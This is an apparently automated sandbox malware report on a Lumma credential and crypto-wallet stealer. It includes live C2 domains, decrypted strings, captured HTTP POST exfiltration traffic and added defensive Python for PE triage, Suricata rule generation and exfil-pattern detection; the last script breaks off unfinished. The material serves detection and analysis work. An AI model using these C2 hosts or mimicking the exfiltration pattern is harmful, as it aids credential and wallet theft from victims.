Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545042
MD5: 00e4faf579951dedcfe07699f0816ea9
SHA1: 39c1e768620ecd4d0da3b1625a8186377f186f04
SHA256: 61026d58b1772d55debe9e7cf29acf688b23ed1b1eda22f499dde79037bcef8e
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
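Three of the static signatures in the list above (an invalid PE checksum, an entry point outside the standard sections, and section names with special or non-standard characters) can be reproduced offline without a sandbox. The following Python is an added example, not Joe Sandbox code, and it does not touch the sample itself: build_pe() constructs a minimal PE32 in memory so that the checks can be exercised, and the set of "standard" section names, the sections an entry point is expected to live in, and the rule that a stored checksum of zero counts as invalid are this example's assumptions rather than Joe Sandbox's exact logic.

```python
"""Static PE triage for three signatures from this report: invalid checksum,
entry point outside the standard code section(s), and section names with
special / non-standard characters. Added example, not Joe Sandbox code.
STANDARD_SECTIONS, CODE_SECTIONS and the "stored == 0 is invalid" rule are
assumptions; build_pe() constructs a minimal PE32 for exercising the checks."""
import re
import struct

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
                     ".bss", ".tls", ".pdata", ".CRT", ".debug"}            # assumption
CODE_SECTIONS = {".text", "CODE", ".code", "INIT"}  # where an entry point is expected (assumption)
ALLOWED_NAME = re.compile(r"[A-Za-z0-9._$]+")


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """OptionalHeader.CheckSum algorithm: sum every dword except the CheckSum
    field with end-around carry, fold to 16 bits, add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == checksum_offset // 4:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage_pe(data: bytes) -> dict:
    """Parse the headers and return the findings a triage analyst wants first."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    nt = struct.unpack_from("<I", data, 0x3C)[0]
    if data[nt:nt + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsections = struct.unpack_from("<H", data, nt + 6)[0]
    opt_size = struct.unpack_from("<H", data, nt + 20)[0]
    opt = nt + 24                                        # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]       # 0x10B PE32, 0x20B PE32+
    entry = struct.unpack_from("<I", data, opt + 16)[0]  # AddressOfEntryPoint (RVA)
    checksum_off = opt + 64                              # same offset for PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    computed = pe_checksum(data, checksum_off)
    sections, findings, entry_section = [], [], None
    for i in range(nsections):
        raw_name, vsize, va = struct.unpack_from("<8sII", data, opt + opt_size + 40 * i)
        name = raw_name.rstrip(b"\0").decode("latin-1")
        sections.append((name, va, vsize))
        if va <= entry < va + max(vsize, 1):
            entry_section = name
        if not ALLOWED_NAME.fullmatch(name):
            findings.append(f"section name with special chars: {name!r}")
        elif name not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {name!r}")
    if entry_section not in CODE_SECTIONS:
        findings.append(f"entry point 0x{entry:X} lies outside standard code sections (in {entry_section!r})")
    valid = stored != 0 and stored == computed
    if not valid:
        findings.append(f"invalid checksum: stored 0x{stored:X}, computed 0x{computed:X}")
    return {"pe32plus": magic == 0x20B, "entry": entry, "entry_section": entry_section,
            "sections": sections, "checksum_stored": stored, "checksum_computed": computed,
            "checksum_valid": valid, "findings": findings}


def build_pe(sections, entry_rva: int, checksum: int = 0, file_align: int = 0x200) -> bytes:
    """Constructed minimal PE32: headers in the first file_align bytes, then one
    zero-filled raw block per section. sections = [(name, rva, virtual_size), ...]."""
    n = len(sections)
    hdr = bytearray(file_align)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                       # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, n, 0, 0, 0, 224, 0x0102)  # IMAGE_FILE_HEADER
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                       # Magic: PE32
    struct.pack_into("<I", hdr, opt + 16, entry_rva)
    struct.pack_into("<I", hdr, opt + 28, 0x400000)               # ImageBase
    struct.pack_into("<II", hdr, opt + 32, 0x1000, file_align)    # SectionAlignment, FileAlignment
    struct.pack_into("<II", hdr, opt + 56, 0x1000 * (n + 1), file_align)  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", hdr, opt + 64, checksum)
    struct.pack_into("<I", hdr, opt + 92, 16)                     # NumberOfRvaAndSizes
    for i, (name, va, vsize) in enumerate(sections):
        off = opt + 224 + 40 * i
        struct.pack_into("<8sIIII", hdr, off, name.encode("latin-1"), vsize, va,
                         file_align, file_align * (i + 1))
        struct.pack_into("<I", hdr, off + 36, 0x60000020)         # CODE | EXECUTE | READ
    return bytes(hdr) + b"\0" * (file_align * n)


if __name__ == "__main__":
    sample = build_pe([(".text", 0x1000, 0x1000), (".rdata", 0x2000, 0x1000),
                       ("!#;~", 0x3000, 0x1000)], entry_rva=0x3010)
    for finding in triage_pe(sample)["findings"]:
        print(finding)
```

Run triage_pe() over the real file bytes to get the same three findings the sandbox reports; a stored checksum of zero is common for unsigned builds, so on its own it is weak evidence, while an entry point inside a section with unprintable characters is a strong packer/obfuscation indicator.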

Classification

  • System is w10x64
  • file.exe (PID: 5800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 00E4FAF579951DEDCFE07699F0816EA9)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

{"C2 url": ["founpiuer.store", "necklacedmny.store", "crisiwarny.store", "fadehairucw.store", "navygenerayk.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Byone--"}
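The extracted configuration above is the most directly actionable part of this report. As an added example (not Joe Sandbox or Lumma code), the following Python turns that C2 list into local Suricata DNS-query and TLS-SNI rules, mirroring the ET rule pairs that fired in this run (2057123/2057124 and so on), and checks resolver and proxy log lines against it. The private SID range, the log line format and the sample lines are assumptions; the sample lines reuse timestamps, ports and domains from this report plus two constructed benign entries.

```python
"""Turn the C2 list from the extracted LummaC configuration into local
Suricata rules and match resolver / TLS-SNI logs against it.
Added example, not Joe Sandbox or Lumma code. The private SID range, the
log line format and the sample log lines are assumptions/constructed."""
import json
import re

# "Malware Configuration Extractor" output from this report, verbatim.
CONFIG_JSON = ('{"C2 url": ["founpiuer.store", "necklacedmny.store", "crisiwarny.store", '
               '"fadehairucw.store", "navygenerayk.store", "presticitpo.store", '
               '"thumbystriw.store", "scriptyprefej.store"], "Build id": "Byone--"}')

LOCAL_SID_BASE = 9100000  # assumption: a private SID range reserved for local rules

# Constructed log lines: "<ts> <src>:<sport> -> <dst>:<dport> query|sni <name>".
# Timestamps, ports and domains are taken from this report; the
# www.example.org / store.example lines are benign decoys.
SAMPLE_LOG = """\
2024-10-30T02:26:59.580284+0100 192.168.2.5:54712 -> 1.1.1.1:53 query presticitpo.store
2024-10-30T02:26:59.635028+0100 192.168.2.5:54886 -> 1.1.1.1:53 query necklacedmny.store
2024-10-30T02:26:59.700000+0100 192.168.2.5:54900 -> 1.1.1.1:53 query www.example.org
2024-10-30T02:27:00.285955+0100 192.168.2.5:49704 -> 188.114.97.3:443 sni necklacedmny.store
2024-10-30T02:27:00.300000+0100 192.168.2.5:49712 -> 188.114.97.3:443 sni store.example
""".splitlines()

LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):\d+ "
                    r"(?P<kind>query|sni) (?P<name>\S+)$")


def c2_domains(config_json: str) -> list:
    """Normalise the C2 list: lower-case, strip scheme/path, de-duplicate, keep order."""
    cfg = json.loads(config_json)
    seen, out = set(), []
    for entry in cfg.get("C2 url", []):
        host = re.sub(r"^[a-z]+://", "", entry.strip().lower()).split("/")[0].rstrip(".")
        if host and host not in seen:
            seen.add(host)
            out.append(host)
    return out


def suricata_rules(domains, build_id: str, sid_base: int = LOCAL_SID_BASE) -> list:
    """One dns.query rule and one tls.sni rule per domain. 'endswith' also
    catches subdomains; a leading dot is not enforced, so a host such as
    xnecklacedmny.store would match too, which is acceptable for a C2 list."""
    rules, sid = [], sid_base
    for d in domains:
        shown = d.replace(".", " .")  # defanged, the way the ET messages print it
        rules.append(f'alert dns $HOME_NET any -> any any (msg:"LOCAL Lumma CnC domain in DNS lookup ({shown})"; '
                     f'dns.query; content:"{d}"; nocase; endswith; '
                     f'metadata:build_id {build_id}; classtype:domain-c2; sid:{sid}; rev:1;)')
        rules.append(f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL Lumma CnC domain in TLS SNI ({shown})"; '
                     f'tls.sni; content:"{d}"; nocase; endswith; '
                     f'metadata:build_id {build_id}; classtype:domain-c2; sid:{sid + 1}; rev:1;)')
        sid += 2
    return rules


def match_logs(lines, domains) -> list:
    """Return (ts, src, kind, name) for every query / SNI that is a C2 domain or a subdomain of one."""
    suffixes = tuple("." + d for d in domains)
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        name = m["name"].lower().rstrip(".")
        if name in domains or name.endswith(suffixes):
            hits.append((m["ts"], m["src"], m["kind"], name))
    return hits


if __name__ == "__main__":
    doms = c2_domains(CONFIG_JSON)
    print("\n".join(suricata_rules(doms, json.loads(CONFIG_JSON)["Build id"])))
    for hit in match_logs(SAMPLE_LOG, doms):
        print("HIT", *hit)
```

The classtype domain-c2 must exist in classification.config (it does in the ET set, which is where the "Domain Observed Used for C2 Detected" text in the Suricata table comes from). Keep the build id in the rule metadata: when several builds share infrastructure, it is the quickest way to tell which campaign a hit belongs to.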
Yara Overview

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2123719627.00000000011B4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(10 further memory-dump matches are collapsed in the original report)
              No Sigma rule has matched
Suricata Overview

Timestamp                        SID      Sev  Classtype                                      Source             Destination        Proto
2024-10-30T02:27:00.796437+0100  2054653  1    A Network Trojan was detected                  192.168.2.5:49704  188.114.97.3:443   TCP
2024-10-30T02:27:01.973958+0100  2054653  1    A Network Trojan was detected                  192.168.2.5:49705  188.114.97.3:443   TCP
2024-10-30T02:27:00.796437+0100  2049836  1    A Network Trojan was detected                  192.168.2.5:49704  188.114.97.3:443   TCP
2024-10-30T02:27:01.973958+0100  2049812  1    A Network Trojan was detected                  192.168.2.5:49705  188.114.97.3:443   TCP
2024-10-30T02:27:00.285955+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49704  188.114.97.3:443   TCP
2024-10-30T02:27:01.506961+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49705  188.114.97.3:443   TCP
2024-10-30T02:27:02.910210+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49706  188.114.97.3:443   TCP
2024-10-30T02:27:04.230056+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49707  188.114.97.3:443   TCP
2024-10-30T02:27:05.844141+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49708  188.114.97.3:443   TCP
2024-10-30T02:27:07.574027+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49709  188.114.97.3:443   TCP
2024-10-30T02:27:09.216409+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49710  188.114.97.3:443   TCP
2024-10-30T02:27:11.546110+0100  2057124  1    Domain Observed Used for C2 Detected           192.168.2.5:49711  188.114.97.3:443   TCP
2024-10-30T02:26:59.599684+0100  2057129  1    Domain Observed Used for C2 Detected           192.168.2.5:51374  1.1.1.1:53         UDP
2024-10-30T02:26:59.610112+0100  2057127  1    Domain Observed Used for C2 Detected           192.168.2.5:63190  1.1.1.1:53         UDP
2024-10-30T02:26:59.635028+0100  2057123  1    Domain Observed Used for C2 Detected           192.168.2.5:54886  1.1.1.1:53         UDP
2024-10-30T02:26:59.580284+0100  2057131  1    Domain Observed Used for C2 Detected           192.168.2.5:54712  1.1.1.1:53         UDP
2024-10-30T02:26:59.622783+0100  2057125  1    Domain Observed Used for C2 Detected           192.168.2.5:63763  1.1.1.1:53         UDP
2024-10-30T02:27:08.044078+0100  2048094  1    Malware Command and Control Activity Detected  192.168.2.5:49709  188.114.97.3:443   TCP


              AV Detection

Source: file.exe; Avira: detected
Source: file.exe.5800.0.memstrmin; Malware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "necklacedmny.store", "crisiwarny.store", "fadehairucw.store", "navygenerayk.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "Byone--"}
Source: necklacedmny.store; Virustotal: Detection: 20%
Source: presticitpo.store; Virustotal: Detection: 11%
Source: fadehairucw.store; Virustotal: Detection: 12%
Source: thumbystriw.store; Virustotal: Detection: 14%
Source: file.exe; Virustotal: Detection: 50%
Source: file.exe; ReversingLabs: Detection: 39%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe; Joe Sandbox ML: detected
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: scriptyprefej.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: navygenerayk.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: founpiuer.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: necklacedmny.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: thumbystriw.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: fadehairucw.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: crisiwarny.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: presticitpo.store
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: - Screen Resoluton: (sic, as decrypted from the sample)
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: Workgroup: -
Source: 00000000.00000002.2170351228.0000000000911000.00000040.00000001.01000000.00000003.sdmp; String decryptor: 4SD0y4--legendaryy
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe; Code function: 4x nop then cwde 0_3_011AFF9C (reported 14 times)

              Networking

Source: Network traffic; Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:54886 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:54712 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:63763 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:51374 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:63190 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Malware configuration extractor; URLs: founpiuer.store
Source: Malware configuration extractor; URLs: necklacedmny.store
Source: Malware configuration extractor; URLs: crisiwarny.store
Source: Malware configuration extractor; URLs: fadehairucw.store
Source: Malware configuration extractor; URLs: navygenerayk.store
Source: Malware configuration extractor; URLs: presticitpo.store
Source: Malware configuration extractor; URLs: thumbystriw.store
Source: Malware configuration extractor; URLs: scriptyprefej.store
Source: Joe Sandbox View; IP Address: 188.114.97.3
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: necklacedmny.store
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12840 | Host: necklacedmny.store
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15082 | Host: necklacedmny.store
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20572 | Host: necklacedmny.store
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1259 | Host: necklacedmny.store
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 570588 | Host: necklacedmny.store
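The seven POSTs above are the whole C2 conversation: two short form-urlencoded requests (8 and 52 bytes, the check-in that ET 2054653 "CnC Host Checkin" keys on), then five multipart uploads to the same /api path that grow to 570588 bytes and all reuse the boundary be85de5ipdocierre1. Note that the captured requests carry a Chrome 119 User-Agent even though TeslaBrowser/5.5 is present in the decrypted strings, so a rule keyed on that older UA alone would miss this build. The following Python is an added example, not Joe Sandbox code, that detects this check-in-then-upload pattern in an HTTP log without depending on the UA. The tab-separated log format and the sample lines are constructed; sizes, host, path, content types and the shared boundary are from this report, and mapping each POST onto the report's TLS connection timestamps (ports 49704-49710) is an assumption.

```python
"""Detect the check-in-then-upload sequence from this report in an HTTP log.
Added example, not Joe Sandbox code. The tab-separated log format and the
sample lines are constructed; request sizes, host, path, content types and
the shared MIME boundary are from the report, and mapping each POST onto the
report's connection timestamps (ports 49704-49710) is an assumption."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# ts <TAB> src <TAB> sport <TAB> host <TAB> method <TAB> path <TAB> content-type <TAB> content-length
# The last two lines are a constructed benign upload with fresh per-request boundaries.
SAMPLE_HTTP_LOG = """\
2024-10-30T02:27:00.796+01:00\t192.168.2.5\t49704\tnecklacedmny.store\tPOST\t/api\tapplication/x-www-form-urlencoded\t8
2024-10-30T02:27:01.973+01:00\t192.168.2.5\t49705\tnecklacedmny.store\tPOST\t/api\tapplication/x-www-form-urlencoded\t52
2024-10-30T02:27:02.910+01:00\t192.168.2.5\t49706\tnecklacedmny.store\tPOST\t/api\tmultipart/form-data; boundary=be85de5ipdocierre1\t12840
2024-10-30T02:27:04.230+01:00\t192.168.2.5\t49707\tnecklacedmny.store\tPOST\t/api\tmultipart/form-data; boundary=be85de5ipdocierre1\t15082
2024-10-30T02:27:05.844+01:00\t192.168.2.5\t49708\tnecklacedmny.store\tPOST\t/api\tmultipart/form-data; boundary=be85de5ipdocierre1\t20572
2024-10-30T02:27:07.574+01:00\t192.168.2.5\t49709\tnecklacedmny.store\tPOST\t/api\tmultipart/form-data; boundary=be85de5ipdocierre1\t1259
2024-10-30T02:27:09.216+01:00\t192.168.2.5\t49710\tnecklacedmny.store\tPOST\t/api\tmultipart/form-data; boundary=be85de5ipdocierre1\t570588
2024-10-30T02:27:10.000+01:00\t192.168.2.5\t49720\tupload.example.org\tPOST\t/files\tmultipart/form-data; boundary=----WebKitFormBoundaryA1b2C3\t40000
2024-10-30T02:27:11.000+01:00\t192.168.2.5\t49721\tupload.example.org\tPOST\t/files\tmultipart/form-data; boundary=----WebKitFormBoundaryD4e5F6\t40000
"""


@dataclass
class Req:
    ts: datetime
    src: str
    sport: int
    host: str
    method: str
    path: str
    ctype: str
    length: int


def parse_http_log(text: str) -> list:
    """Parse the constructed TSV format into Req records."""
    reqs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, host, method, path, ctype, length = line.split("\t")
        reqs.append(Req(datetime.fromisoformat(ts), src, int(sport), host,
                        method, path, ctype, int(length)))
    return reqs


def boundary_of(ctype: str):
    m = re.search(r"boundary=([^;\s]+)", ctype)
    return m.group(1) if m else None


def detect_exfil_sequences(reqs, window_s=60, checkin_max=64, min_uploads=2, min_bytes=10_000) -> list:
    """Per (src, host, path): a form-urlencoded POST of at most checkin_max
    bytes (the check-in, 8 bytes in this report) followed within window_s by
    at least min_uploads multipart POSTs totalling min_bytes or more.
    Reusing one boundary across uploads is reported as an extra indicator:
    browsers generate a fresh boundary per request, this sample does not."""
    by_key = defaultdict(list)
    for r in reqs:
        if r.method == "POST":
            by_key[(r.src, r.host, r.path)].append(r)
    alerts = []
    for (src, host, path), rs in by_key.items():
        rs.sort(key=lambda r: r.ts)
        for i, r in enumerate(rs):
            if not r.ctype.startswith("application/x-www-form-urlencoded") or r.length > checkin_max:
                continue
            uploads = [x for x in rs[i + 1:]
                       if (x.ts - r.ts).total_seconds() <= window_s
                       and x.ctype.startswith("multipart/form-data")]
            total = sum(x.length for x in uploads)
            if len(uploads) < min_uploads or total < min_bytes:
                continue
            alerts.append({
                "src": src, "host": host, "path": path,
                "checkin_ts": r.ts.isoformat(), "checkin_len": r.length,
                "uploads": len(uploads), "bytes": total,
                "ports": [x.sport for x in uploads],
                "fixed_boundary": len({boundary_of(x.ctype) for x in uploads}) == 1,
            })
            break  # one alert per key, anchored on the first check-in
    return alerts


if __name__ == "__main__":
    for a in detect_exfil_sequences(parse_http_log(SAMPLE_HTTP_LOG)):
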